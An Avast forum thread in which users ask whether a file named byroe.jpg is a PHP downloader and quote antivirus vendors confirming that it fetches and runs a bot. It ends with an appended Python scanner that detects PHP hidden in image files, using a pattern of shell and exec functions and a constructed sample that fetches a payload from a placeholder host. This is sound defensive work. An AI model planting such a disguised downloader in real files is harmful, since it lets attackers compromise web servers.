Avast WEBforum

Other => Viruses and worms => Topic started by: polonus on August 10, 2011, 06:39:49 PM

Title: Does site have a PHP downloader?
Post by: polonus on August 10, 2011, 06:39:49 PM
See: http://www.virustotal.com/url-scan/report.html?id=d9f0ee71954863bb7354906ebfce4b37-1312985843
and accompanying scan: http://www.virustotal.com/file-scan/report.html?id=ac50e4038d7ef80770860138896415178a156eca38e31d725a598fa8b1f611ce-1312993064
Also consider this: http://anubis.iseclab.org/?action=result&task_id=1fd2bde677aeabbb439a866659e5952b9&format=html
Only flag is from Clamav
 WARNING! FILE MAY BE INFECTED!
Clamav
byroe.jpg: PHP.Downloader FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 0.005 sec (0 m 0 s)
Is this real or a false positive? (see attached gif image)

Here the site is given clean: http://www.urlvoid.com/scan/bichoquerido.com
Here also sucuri:
status:   Verified Clean
web trust:     Not Blacklisted

polonus
Title: Re: Does site have a PHP downloader?
Post by: polonus on August 10, 2011, 09:45:12 PM
My forum friends,

As this probably should be detected as "PHP:Multicom-B" by avast's webshield, as is my guess, it is not, but what happens is that I am stopped from going there by BitDefender TrafficLight extension in my Google Chrome browser.
Here it was not being detected: http://wepawet.cs.ucsb.edu/view.php?hash=224171abb521a8bad1b8084974fc6c78&t=1313005017&type=js
But is in this database as RFI attack site: -http://www.bizimbal.com/odb/details.html?id=976939

polonus
Title: Re: Does site have a PHP downloader?
Post by: Pondus on August 11, 2011, 10:41:12 AM
This is what Avira says
Quote
The file 'byroe.jpg' has been determined to be 'MALWARE'. Our analysts named the threat PHP/Dldr.Zit.J. The term "PHP/" denotes a PHP script virus. Detection will be added to our virus definition file (VDF) with one of the next updates.


and SOPHOS
Quote
The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly.


Norman
Quote
It's been cleared that the file is malicious and has the behavior of downloading a bot file and executing it.
byroe.jpg : Processed - PHP/Dloader.AE
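The vendors above agree that byroe.jpg is a PHP downloader carrying an image name. As an added example (not code from this thread or from any of the scanners quoted), here is a small defender-side check for a web root: it compares each image-named file's magic bytes with its extension, looks for PHP open tags anywhere in the content (so a real JPEG with PHP appended is caught too), and lists functions typical of downloader scripts. The sample bytes and the placeholder URL are constructed for the example.

```python
import re
from pathlib import Path

# Magic bytes for the image types a web upload folder normally holds.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Calls common in PHP downloader / RFI payloads; illustrative, not exhaustive.
SUSPICIOUS = re.compile(
    rb"\b(eval|base64_decode|file_get_contents|fopen|fwrite|curl_exec|"
    rb"system|exec|shell_exec|passthru|include|require)\s*\(",
    re.IGNORECASE,
)

def image_type(data: bytes):
    """Return the image type by magic bytes, or None if it is not a known image."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def inspect_bytes(name: str, data: bytes) -> dict:
    """Classify one file's bytes; nothing is executed, only pattern-matched."""
    ext = Path(name).suffix.lower()
    findings = {
        "name": name,
        "image_magic": image_type(data),
        "has_php_tag": bool(PHP_TAG.search(data)),
        "suspicious_calls": sorted({m.group(1).lower().decode()
                                    for m in SUSPICIOUS.finditer(data)}),
    }
    # Flag image-named files that contain PHP, whether or not a real image header is present.
    findings["flag"] = ext in {".jpg", ".jpeg", ".png", ".gif"} and findings["has_php_tag"]
    return findings

def scan_directory(root: str) -> list:
    """Walk a directory tree and return findings for every flagged file."""
    return [r for p in Path(root).rglob("*") if p.is_file()
            for r in [inspect_bytes(p.name, p.read_bytes())] if r["flag"]]

# Constructed samples: a JPEG header, and a PHP script saved under a .jpg name
# (placeholder.invalid is a non-resolving placeholder, not a real host).
CLEAN_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
FAKE_JPG = b"<?php $r = file_get_contents('http://placeholder.invalid/bot.txt'); ?>"
```

Run `scan_directory("/var/www/html")` (path is an assumption) on a copy of the web root; a hit such as `byroe.jpg` with `image_magic` None and `file_get_contents` listed is exactly the case the scanners above reported.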